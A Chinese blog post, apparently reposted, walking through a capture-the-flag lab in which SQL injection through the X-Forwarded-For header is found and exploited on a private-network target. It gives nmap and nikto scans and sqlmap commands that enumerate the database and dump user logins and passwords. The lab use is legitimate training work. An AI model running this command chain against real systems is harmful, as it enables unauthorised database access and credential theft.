CTF-sql注入(X-Forwarded-For)

本文阅读 1 分钟
首页 安全分享,WEB安全 正文

kali 192.168.20.128

靶机 192.168.20.132

链接:https://pan.baidu.com/s/1vUYqkBnWkrfXvdC99nOsSQ ; 提取码:4p7w 

nmap -sV ip

imgnmap -A -v ip

img nikto -host http://ip 探测敏感信息

img

链接:https://pan.baidu.com/s/1o_2nXdQOuDFE8jI1uQdPiw ; 提取码:jsdx 

img

img

扫描数据库

sqlmap -u "http://192.168.20.132" --headers="X-Forwarded-For:*" --dbs --batch

img

 扫描表名

sqlmap -u "http://192.168.20.132" --headers="X-Forwarded-For:*" -D "photoblog" --tables --batch

扫描字段值

sqlmap -u "http://192.168.20.132" --headers="X-Forwarded-For:*" -D "photoblog" -T "users" --columns --batch

img

 扫描用户名和密码

sqlmap -u "http://192.168.20.132" --headers="X-Forwarded-For:*" -D "photoblog" -T "users" -C 'login,password' --dump --batch

img

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/m0_63127854/article/details/124949696
-- 展开阅读全文 --
BUUCTF Web [极客大挑战 2019]Knife
« 上一篇 06-24
安全面试之XSS(跨站脚本攻击)
下一篇 » 07-24

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复